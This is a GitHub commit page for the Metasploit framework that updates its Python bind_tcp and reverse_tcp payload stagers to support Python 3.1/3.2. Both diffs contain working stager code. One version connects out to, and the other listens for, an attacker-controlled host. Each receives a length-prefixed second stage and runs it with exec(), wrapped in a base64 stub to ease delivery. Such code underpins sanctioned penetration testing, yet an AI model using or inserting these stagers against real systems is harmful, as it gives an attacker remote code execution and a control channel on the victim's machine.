Skip to content

Commit aeca455

Browse files
zeroSteinerzeroSteiner
committed
Pymeterpreter update pystagers for version 3.1/3.2
1 parent b842979 commit aeca455

File tree

2 files changed

+28
-24
lines changed

2 files changed

+28
-24
lines changed

modules/payloads/stagers/python/bind_tcp.rb

Lines changed: 15 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -29,22 +29,24 @@ def initialize(info = {})
2929
# Constructs the payload
3030
#
3131
def generate
32-
cmd = ''
3332
# Set up the socket
34-
cmd += "import socket,struct\n"
35-
cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
36-
cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
37-
cmd += "s.listen(1)\n"
38-
cmd += "c,a=s.accept()\n"
39-
cmd += "l=struct.unpack('>I',c.recv(4))[0]\n"
40-
cmd += "d=c.recv(4096)\n"
41-
cmd += "while len(d)!=l:\n"
42-
cmd += "\td+=c.recv(4096)\n"
43-
cmd += "exec(d,{'s':c})\n"
33+
cmd = "import socket,struct\n"
34+
cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
35+
cmd << "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
36+
cmd << "s.listen(1)\n"
37+
cmd << "c,a=s.accept()\n"
38+
cmd << "l=struct.unpack('>I',c.recv(4))[0]\n"
39+
cmd << "d=c.recv(4096)\n"
40+
cmd << "while len(d)!=l:\n"
41+
cmd << "\td+=c.recv(4096)\n"
42+
cmd << "exec(d,{'s':c})\n"
4443

4544
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
46-
cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
47-
return cmd
45+
b64_stub = "import base64,sys; exec(base64.b64decode("
46+
b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
47+
b64_stub << Rex::Text.encode_base64(cmd)
48+
b64_stub << "')))"
49+
return b64_stub
4850
end
4951

5052
def handle_intermediate_stage(conn, payload)

modules/payloads/stagers/python/reverse_tcp.rb

Lines changed: 13 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -29,20 +29,22 @@ def initialize(info = {})
2929
# Constructs the payload
3030
#
3131
def generate
32-
cmd = ''
3332
# Set up the socket
34-
cmd += "import socket,struct\n"
35-
cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
36-
cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
37-
cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
38-
cmd += "d=s.recv(4096)\n"
39-
cmd += "while len(d)!=l:\n"
40-
cmd += "\td+=s.recv(4096)\n"
41-
cmd += "exec(d,{'s':s})\n"
33+
cmd = "import socket,struct\n"
34+
cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
35+
cmd << "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
36+
cmd << "l=struct.unpack('>I',s.recv(4))[0]\n"
37+
cmd << "d=s.recv(4096)\n"
38+
cmd << "while len(d)!=l:\n"
39+
cmd << "\td+=s.recv(4096)\n"
40+
cmd << "exec(d,{'s':s})\n"
4241

4342
# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
44-
cmd = "import base64; exec(base64.b64decode('#{Rex::Text.encode_base64(cmd)}'))"
45-
return cmd
43+
b64_stub = "import base64,sys; exec(base64.b64decode("
44+
b64_stub << "(str if sys.version_info[0]==2 else lambda b:bytes(b,'UTF-8'))('"
45+
b64_stub << Rex::Text.encode_base64(cmd)
46+
b64_stub << "')))"
47+
return b64_stub
4648
end
4749

4850
def handle_intermediate_stage(conn, payload)

0 commit comments

Comments
 (0)